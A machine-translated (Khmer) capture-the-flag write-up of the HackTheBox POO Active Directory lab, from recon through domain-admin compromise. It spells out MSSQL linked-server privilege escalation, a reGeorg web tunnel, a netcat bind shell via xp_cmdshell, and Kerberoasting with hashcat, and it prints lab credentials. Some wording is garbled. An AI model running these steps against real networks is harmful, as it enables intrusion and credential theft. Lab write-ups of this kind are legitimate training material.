HackTheBoxendgame ។ ការឆ្លងកាត់មន្ទីរពិសោធន៍ ប្រតិបត្តិការវាយលុកប្រកបដោយវិជ្ជាជីវៈ។ Pentest Active Directory

នៅក្នុងអត្ថបទនេះ យើងនឹងវិភាគការអនុម័តមិនត្រឹមតែម៉ាស៊ីនប៉ុណ្ណោះទេ ប៉ុន្តែជាមន្ទីរពិសោធន៍ខ្នាតតូចទាំងមូលពីគេហទំព័រ HackThoBoxBoxBox.

ដូចដែលបានបញ្ជាក់នៅក្នុងការពិពណ៌នា POO ត្រូវបានរចនាឡើងដើម្បីសាកល្បងជំនាញនៅគ្រប់ដំណាក់កាលនៃការវាយប្រហារនៅក្នុងបរិយាកាស Active Directory តូចមួយ។ គោលដៅគឺដើម្បីសម្របសម្រួលម៉ាស៊ីនដែលមាន បង្កើនសិទ្ធិ ហើយទីបំផុតសម្របសម្រួលដែនទាំងមូលដោយការប្រមូលទង់ចំនួន 5 នៅក្នុងដំណើរការ។

ការតភ្ជាប់ទៅមន្ទីរពិសោធន៍គឺតាមរយៈ VPN ។ វាត្រូវបានណែនាំមិនឱ្យភ្ជាប់ពីកុំព្យូទ័រដែលកំពុងធ្វើការ ឬពីម៉ាស៊ីនដែលមានទិន្នន័យសំខាន់ៗសម្រាប់អ្នក នៅពេលអ្នកចូលទៅក្នុងបណ្តាញឯកជនជាមួយមនុស្សដែលដឹងអំពីសុវត្ថិភាពព័ត៌មាន 🙂

ព័ត៌មានអង្គការ
ដូច្នេះ​អ្នក​អាច​ស្វែង​យល់​អំពី​អត្ថបទ​ថ្មី កម្មវិធី និង​ព័ត៌មាន​ផ្សេង​ទៀត ខ្ញុំ​បាន​បង្កើត ឆានែល Telegram и ក្រុមដើម្បីពិភាក្សាបញ្ហាណាមួយ។ នៅក្នុងតំបន់នៃ IIKB ។ សំណើផ្ទាល់ខ្លួន សំណួរ សំណូមពរ និងអនុសាសន៍របស់អ្នកផងដែរ។ ខ្ញុំ​នឹង​មើល ហើយ​ឆ្លើយ​ទៅ​អ្នក​រាល់​គ្នា។.

ព័ត៌មានទាំងអស់ត្រូវបានផ្តល់ជូនសម្រាប់គោលបំណងអប់រំតែប៉ុណ្ណោះ។ អ្នកនិពន្ធនៃឯកសារនេះសន្មត់ថាមិនមានការទទួលខុសត្រូវចំពោះការខូចខាតណាមួយដែលបង្កឡើងចំពោះនរណាម្នាក់ដែលជាលទ្ធផលនៃការប្រើប្រាស់ចំណេះដឹង និងវិធីសាស្រ្តដែលទទួលបានជាលទ្ធផលនៃការសិក្សាឯកសារនេះ។

ការណែនាំ

ហ្គេមបញ្ចប់នេះមានម៉ាស៊ីនពីរ និងមានទង់ចំនួន 5 ។

ការពិពណ៌នា និងអាសយដ្ឋានរបស់ម៉ាស៊ីនដែលមានស្រាប់ក៏ត្រូវបានផ្តល់ឱ្យផងដែរ។

តោះចាប់ផ្តើម!

ទង់ជាតិ Recon

ម៉ាស៊ីននេះមានអាសយដ្ឋាន IP នៃ 10.13.38.11 ដែលខ្ញុំបន្ថែមទៅ /etc/hosts ។
10.13.38.11 poo.htb

ជំហានដំបូងគឺត្រូវស្កេនច្រកបើក។ ដោយសារវាត្រូវការពេលយូរដើម្បីស្កេនច្រកទាំងអស់ដោយប្រើ nmap ដំបូងខ្ញុំនឹងធ្វើវាជាមួយ masscan ។ យើងស្កេនច្រក TCP និង UDP ទាំងអស់ពីចំណុចប្រទាក់ tun0 នៅ 500pps ។

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

ឥឡូវនេះ ដើម្បីទទួលបានព័ត៌មានលម្អិតបន្ថែមអំពីសេវាកម្មដែលដំណើរការនៅលើច្រក សូមដំណើរការស្កេនដោយប្រើជម្រើស -A ។

nmap -A poo.htb -p80,1433

ដូច្នេះយើងមានសេវាកម្ម IIS និង MSSQL ។ ក្នុងករណីនេះ យើងនឹងស្វែងរកឈ្មោះ DNS ពិតប្រាកដរបស់ domain និងកុំព្យូទ័រ។ នៅលើម៉ាស៊ីនមេគេហទំព័រ យើងត្រូវបានស្វាគមន៍ដោយទំព័រដើម IIS ។

ចូរយើងរំលឹកឡើងវិញនៅលើថត។ ខ្ញុំប្រើ gobuster សម្រាប់ការនេះ។ នៅក្នុងប៉ារ៉ាម៉ែត្រយើងបញ្ជាក់ចំនួននៃការផ្សាយ 128 (-t), URL (-u), វចនានុក្រម (-w) និងផ្នែកបន្ថែមដែលចាប់អារម្មណ៍យើង (-x) ។

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

ដូច្នេះ យើងមានការផ្ទៀងផ្ទាត់ HTTP សម្រាប់ថត /admin ក៏ដូចជាឯកសារផ្ទុកសេវាផ្ទៃតុ .DS_Store ដែលមាន។ .DS_Store គឺជាឯកសារដែលរក្សាទុកការកំណត់អ្នកប្រើប្រាស់សម្រាប់ថតឯកសារ ដូចជាបញ្ជីឯកសារ ទីតាំងរូបតំណាង រូបភាពផ្ទៃខាងក្រោយដែលបានជ្រើសរើស។ ឯកសារបែបនេះអាចបញ្ចប់នៅក្នុងថតម៉ាស៊ីនមេគេហទំព័ររបស់អ្នកអភិវឌ្ឍន៍គេហទំព័រ។ ដូច្នេះ យើងទទួលបានព័ត៌មានអំពីខ្លឹមសារនៃថតឯកសារ។ សម្រាប់ការនេះអ្នកអាចប្រើ DS_Store crawler.

python3 dsstore_crawler.py -i http://poo.htb/

យើងទទួលបានមាតិកានៃថត។ អ្វីដែលគួរឱ្យចាប់អារម្មណ៍បំផុតនៅទីនេះគឺថត / dev ដែលយើងអាចមើលឃើញប្រភពនិងឯកសារ db ជាពីរសាខា។ ប៉ុន្តែយើងអាចប្រើ 6 តួអក្សរដំបូងនៃឈ្មោះឯកសារ និងថត ប្រសិនបើសេវាកម្មងាយរងគ្រោះដោយ IIS ShortName ។ អ្នកអាចពិនិត្យមើលភាពងាយរងគ្រោះនេះដោយប្រើ ម៉ាស៊ីនស្កេនឈ្មោះខ្លី IIS.

ហើយយើងរកឃើញឯកសារអត្ថបទមួយដែលចាប់ផ្តើមដោយ "poo_co" ។ មិនដឹងថាត្រូវធ្វើអ្វីបន្ទាប់ទេ ខ្ញុំគ្រាន់តែជ្រើសរើសពីវចនានុក្រមនៃបញ្ជីពាក្យទាំងអស់ដែលចាប់ផ្តើមដោយ "សហ" ។

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

ហើយធ្វើម្តងទៀតជាមួយ wfuzz ។

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

ហើយស្វែងរកពាក្យត្រឹមត្រូវ! យើងមើលឯកសារនេះ រក្សាទុកព័ត៌មានសម្ងាត់ (វិនិច្ឆ័យដោយប៉ារ៉ាម៉ែត្រ DBNAME ពួកវាមកពី MSSQL)។

យើង​ប្រគល់​ទង់ជាតិ ហើយ​យើង​ឈាន​ទៅ​មុខ ២០%។

ទង់ជាតិ

យើងភ្ជាប់ទៅ MSSQL ខ្ញុំប្រើ DBeaver ។

យើងមិនបានរកឃើញអ្វីដែលគួរឱ្យចាប់អារម្មណ៍នៅក្នុងមូលដ្ឋានទិន្នន័យនេះទេ ចូរយើងបង្កើត SQL Editor ហើយពិនិត្យមើលថាតើអ្នកប្រើប្រាស់ជាអ្វី។

SELECT name FROM master..syslogins;

យើងមានអ្នកប្រើប្រាស់ពីរនាក់។ សូម​ពិនិត្យ​មើល​សិទ្ធិ​របស់​យើង។

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

ដូច្នេះ​គ្មាន​សិទ្ធិ​អ្វី​ទេ។ តោះមើលម៉ាស៊ីនមេដែលបានភ្ជាប់ខ្ញុំបានសរសេរអំពីបច្ចេកទេសនេះយ៉ាងលំអិត នៅទីនេះ.

SELECT * FROM master..sysservers;

ដូច្នេះយើងរកឃើញ SQL Server ផ្សេងទៀត។ ចូរយើងពិនិត្យមើលការប្រតិបត្តិនៃពាក្យបញ្ជានៅលើម៉ាស៊ីនមេនេះដោយប្រើ openquery() ។

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

ហើយ​យើង​ថែមទាំង​អាច​បង្កើត​មែកធាង​សំណួរ។

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

ការពិតគឺថានៅពេលដែលយើងធ្វើការស្នើសុំទៅកាន់ម៉ាស៊ីនមេដែលបានភ្ជាប់ សំណើត្រូវបានប្រតិបត្តិក្នុងបរិបទនៃអ្នកប្រើប្រាស់ផ្សេងទៀត! តោះមើលបរិបទអ្នកប្រើប្រាស់ណាដែលយើងកំពុងដំណើរការនៅលើម៉ាស៊ីនមេដែលបានភ្ជាប់។

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

ហើយឥឡូវនេះសូមមើលនៅក្នុងបរិបទអ្វីដែលសំណើពីម៉ាស៊ីនមេដែលបានភ្ជាប់ទៅរបស់យើងត្រូវបានប្រតិបត្តិ!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

ដូច្នេះ វាគឺជាបរិបទ DBO ដែលត្រូវតែមានសិទ្ធិទាំងអស់។ សូមពិនិត្យមើលសិទ្ធិក្នុងករណីមានសំណើពីម៉ាស៊ីនមេដែលបានភ្ជាប់។

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

ដូចដែលអ្នកអាចឃើញយើងមានសិទ្ធិទាំងអស់! តោះបង្កើត admin របស់យើងបែបនេះ។ ប៉ុន្តែពួកគេមិនអនុញ្ញាតឱ្យពួកគេឆ្លងកាត់សំណួរបើកចំហទេ ចូរធ្វើវាតាមរយៈ EXECUTE AT ។

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

ហើយឥឡូវនេះយើងភ្ជាប់ជាមួយព័ត៌មានសម្ងាត់របស់អ្នកប្រើថ្មី សង្កេតមើលមូលដ្ឋានទិន្នន័យទង់ថ្មី។

យើងប្រគល់ទង់ជាតិនេះ ហើយបន្តទៅមុខទៀត។

ទង់ជាតិខាងក្រោយ

តោះយកសែលដោយប្រើ MSSQL ខ្ញុំកំពុងប្រើ mssqlclient ពីកញ្ចប់ impacket ។

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

យើងត្រូវទទួលបានពាក្យសម្ងាត់ ហើយរឿងដំបូងដែលយើងបានជួបរួចហើយគឺគេហទំព័រ។ ដូច្នេះ យើង​ត្រូវ​ការ​ការ​កំណត់​រចនាសម្ព័ន្ធ​ម៉ាស៊ីន​បម្រើ​បណ្ដាញ (យើង​មិន​អាច​បោះ​សែល​ដែល​ងាយ​ស្រួល​នោះ​ទេ ជាក់ស្តែង​ជញ្ជាំង​ភ្លើង​កំពុង​ដំណើរការ)។

ប៉ុន្តែការចូលប្រើត្រូវបានបដិសេធ។ ទោះបីជាយើងអាចអានឯកសារពី MSSQL ក៏ដោយ យើងគ្រាន់តែត្រូវដឹងពីអ្វីដែលភាសាសរសេរកម្មវិធីត្រូវបានកំណត់រចនាសម្ព័ន្ធ។ ហើយនៅក្នុងថត MSSQL យើងរកឃើញថាមាន Python ។

បន្ទាប់មកមិនមានបញ្ហាក្នុងការអានឯកសារ web.config ទេ។

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

ជាមួយនឹងលិខិតសម្គាល់ដែលបានរកឃើញ សូមចូលទៅកាន់ /admin ហើយយកទង់ជាតិ។

ទង់ជើង

តាមពិត មានការរអាក់រអួលខ្លះៗពីការប្រើប្រាស់ជញ្ជាំងភ្លើង ប៉ុន្តែមើលតាមរយៈការកំណត់បណ្តាញ យើងសង្កេតឃើញថា ពិធីការ IPv6 ក៏ត្រូវបានប្រើប្រាស់ផងដែរ!

បន្ថែមអាសយដ្ឋាននេះទៅ /etc/hosts.
dead:babe::1001 poo6.htb
តោះស្កេនម៉ាស៊ីនម្តងទៀត ប៉ុន្តែលើកនេះលើស IPv6។

ហើយសេវាកម្ម WinRM មាននៅលើ IPv6 ។ ចូរភ្ជាប់ជាមួយលិខិតសម្គាល់ដែលបានរកឃើញ។

មានទង់មួយនៅលើផ្ទៃតុ សូមប្រគល់វា។

ទង់ជាតិ P00ned

បន្ទាប់ពីការឈ្លបយកការណ៍លើម្ចាស់ផ្ទះជាមួយ វីនភីស យើងមិនបានរកឃើញអ្វីពិសេសទេ។ បន្ទាប់មកវាត្រូវបានគេសម្រេចចិត្តរកមើលលិខិតសម្គាល់ម្តងទៀត (ខ្ញុំក៏បានសរសេរលើប្រធានបទនេះផងដែរ។ អត្ថបទ) ប៉ុន្តែខ្ញុំមិនអាចទទួលបាន SPNs ទាំងអស់ពីប្រព័ន្ធតាមរយៈ WinRM ទេ។

setspn.exe -T intranet.poo -Q */*

ចូរប្រតិបត្តិពាក្យបញ្ជាតាមរយៈ MSSQL ។

នៅក្នុងវិធីនេះ យើងទទួលបាន SPN នៃអ្នកប្រើប្រាស់ p00_hr និង p00_adm ដែលមានន័យថាពួកគេងាយរងគ្រោះនឹងការវាយប្រហារដូចជា Kerberoasting ជាដើម។ សរុបមក យើងអាចទទួលបានលេខសម្ងាត់របស់ពួកវា។

ដំបូងអ្នកត្រូវទទួលបានសែលដែលមានស្ថេរភាពក្នុងនាមអ្នកប្រើប្រាស់ MSSQL ។ ប៉ុន្តែដោយសារយើងមានកម្រិតក្នុងការចូលប្រើ យើងមានការតភ្ជាប់ជាមួយម៉ាស៊ីនតាមរយៈច្រក 80 និង 1433 ប៉ុណ្ណោះ។ ប៉ុន្តែ​អាច​ធ្វើ​ចរាចរណ៍​ផ្លូវ​រូង​ក្រោម​ដី​តាម​ច្រក ៨០! សម្រាប់រឿងនេះយើងប្រើ កម្មវិធីបន្ទាប់. តោះផ្ទុកឯកសារ tunnel.aspx ទៅកាន់ថតផ្ទះរបស់ម៉ាស៊ីនមេបណ្តាញ - C: inetpubwwwroot ។

ប៉ុន្តែនៅពេលដែលយើងព្យាយាមចូលប្រើវា យើងទទួលបានកំហុស 404 ។ នេះមានន័យថាឯកសារ *.aspx មិនត្រូវបានប្រតិបត្តិទេ។ ដើម្បីធ្វើឱ្យឯកសារដែលមានផ្នែកបន្ថែមទាំងនេះដំណើរការ សូមដំឡើង ASP.NET 4.5 ដូចខាងក្រោម។

dism /online /enable-feature /all /featurename:IIS-ASPNET45

ហើយឥឡូវនេះ នៅពេលចូលប្រើ tunnel.aspx យើងទទួលបានចម្លើយថាអ្វីៗរួចរាល់ដើម្បីដំណើរការហើយ។

តោះចាប់ផ្តើមផ្នែកអតិថិជននៃកម្មវិធី ដែលនឹងបញ្ជូនចរាចរ។ យើងនឹងបញ្ជូនចរាចរណ៍ទាំងអស់ពីច្រក 5432 ទៅម៉ាស៊ីនមេ។

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

ហើយយើងប្រើ proxychains ដើម្បីផ្ញើចរាចរនៃកម្មវិធីណាមួយតាមរយៈប្រូកស៊ីរបស់យើង។ តោះបន្ថែមប្រូកស៊ីនេះទៅឯកសារកំណត់រចនាសម្ព័ន្ធ /etc/proxychains.conf ។

ឥឡូវ​យើង​បង្ហោះ​កម្មវិធី​ទៅ​ម៉ាស៊ីន​មេ ណេតខេតជាមួយនឹងការដែលយើងនឹងធ្វើឱ្យសែលចងមានស្ថេរភាពនិងស្គ្រីប ហៅ Kerberoastដែលយើងនឹងធ្វើការវាយប្រហារ Kerberoasting ។

ឥឡូវនេះ តាមរយៈ MSSQL យើងបើកដំណើរការកម្មវិធីស្តាប់។

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

ហើយយើងភ្ជាប់តាមរយៈប្រូកស៊ីរបស់យើង។

proxychains rlwrap nc poo.htb 4321

ហើយ​យើង​ទទួល​បាន​សញ្ញា។

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

បន្ទាប់ អ្នកត្រូវធ្វើម្តងទៀតលើសញ្ញាទាំងនេះ។ ដោយសារ Rockyou មិនមានវចនានុក្រមទិន្នន័យពាក្យសម្ងាត់ ខ្ញុំបានប្រើវចនានុក្រមពាក្យសម្ងាត់ទាំងអស់ដែលមាននៅក្នុង Seclists ។ សម្រាប់ការគណនាយើងប្រើ hashcat ។

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

ហើយយើងរកឃើញពាក្យសម្ងាត់ទាំងពីរ ទីមួយនៅក្នុងវចនានុក្រម dutch_passwordlist.txt និងទីពីរនៅក្នុង Keyboard-Combinations.txt។

ដូច្នេះហើយ យើងមានអ្នកប្រើប្រាស់បីនាក់ យើងទៅ domain controller។ ចូរ​ស្វែង​រក​អាសយដ្ឋាន​របស់​គាត់​ជា​មុន​សិន។

ល្អណាស់ យើងបានរៀនអាសយដ្ឋាន IP របស់ឧបករណ៍បញ្ជាដែន។ ចូរយើងស្វែងយល់ពីអ្នកប្រើប្រាស់ទាំងអស់នៃដែន ក៏ដូចជាថាតើពួកគេមួយណាជាអ្នកគ្រប់គ្រង។ ដើម្បីទាញយកស្គ្រីបដើម្បីទទួលបានព័ត៌មាន PowerView.ps1 ។ បន្ទាប់មកយើងនឹងភ្ជាប់ដោយប្រើ evil-winrm ដោយបញ្ជាក់ថតជាមួយស្គ្រីបក្នុងប៉ារ៉ាម៉ែត្រ -s ។ ហើយបន្ទាប់មកគ្រាន់តែផ្ទុកស្គ្រីប PowerView ។

ឥឡូវនេះ យើងមានសិទ្ធិចូលប្រើមុខងារទាំងអស់របស់វា។ អ្នកប្រើប្រាស់ p00_adm មើលទៅដូចជាអ្នកប្រើប្រាស់ដែលមានសិទ្ធិ ដូច្នេះយើងនឹងធ្វើការក្នុងបរិបទរបស់វា។ តោះបង្កើតវត្ថុ PSCredential សម្រាប់អ្នកប្រើប្រាស់នេះ។

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

ឥឡូវនេះពាក្យបញ្ជា Powershell ទាំងអស់ដែលយើងបញ្ជាក់ Creds នឹងត្រូវបានប្រតិបត្តិក្នុងនាម p00_adm ។ ចូរបង្ហាញបញ្ជីអ្នកប្រើប្រាស់ និងគុណលក្ខណៈ AdminCount ។

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

ដូច្នេះហើយ អ្នកប្រើប្រាស់របស់យើងពិតជាមានសិទ្ធិ។ ចាំមើលថាគាត់ជាក្រុមណាខ្លះ?

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

ទីបំផុតយើងបញ្ជាក់ថាអ្នកប្រើប្រាស់គឺជាអ្នកគ្រប់គ្រងដែន។ វាផ្តល់ឱ្យវានូវសិទ្ធិក្នុងការចូលទៅកាន់ឧបករណ៍បញ្ជាដែនពីចម្ងាយ។ តោះព្យាយាមចូលជាមួយ WinRM ដោយប្រើផ្លូវរូងក្រោមដីរបស់យើង។ ខ្ញុំមានការភ័ន្តច្រឡំដោយកំហុសដែលចេញដោយ reGeorg នៅពេលប្រើ evil-winrm ។

បន្ទាប់មកយើងប្រើមួយទៀត ងាយស្រួលជាង។ ស្គ្រីប ដើម្បីភ្ជាប់ទៅ WinRM ។ បើកនិងផ្លាស់ប្តូរប៉ារ៉ាម៉ែត្រនៃការតភ្ជាប់។

យើងព្យាយាមភ្ជាប់ ហើយយើងស្ថិតនៅក្នុងប្រព័ន្ធ។

ប៉ុន្តែមិនមានទង់ជាតិទេ។ បន្ទាប់មកមើលអ្នកប្រើប្រាស់ ហើយពិនិត្យមើលផ្ទៃតុ។

នៅ mr3ks យើងរកឃើញទង់ហើយមន្ទីរពិសោធន៍ត្រូវបានបញ្ចប់ 100% ។

អស់ហើយ។ ជាមតិកែលម្អ សូមផ្តល់មតិលើថាតើអ្នកបានរៀនអ្វីថ្មីពីអត្ថបទនេះ និងថាតើវាមានប្រយោជន៍សម្រាប់អ្នកដែរឬទេ។

អ្នកអាចចូលរួមជាមួយពួកយើងនៅ Telegram. នៅទីនោះអ្នកអាចស្វែងរកសម្ភារៈដែលគួរឱ្យចាប់អារម្មណ៍ វគ្គសិក្សារួមបញ្ចូលគ្នា ក៏ដូចជាកម្មវិធី។ ចូរប្រមូលផ្តុំសហគមន៍មួយដែលនឹងមានមនុស្សដែលយល់ពីផ្នែកជាច្រើននៃ IT បន្ទាប់មកយើងតែងតែអាចជួយគ្នាទៅវិញទៅមកលើបញ្ហា IT និងសន្តិសុខព័ត៌មាន។

ប្រភព: www.habr.com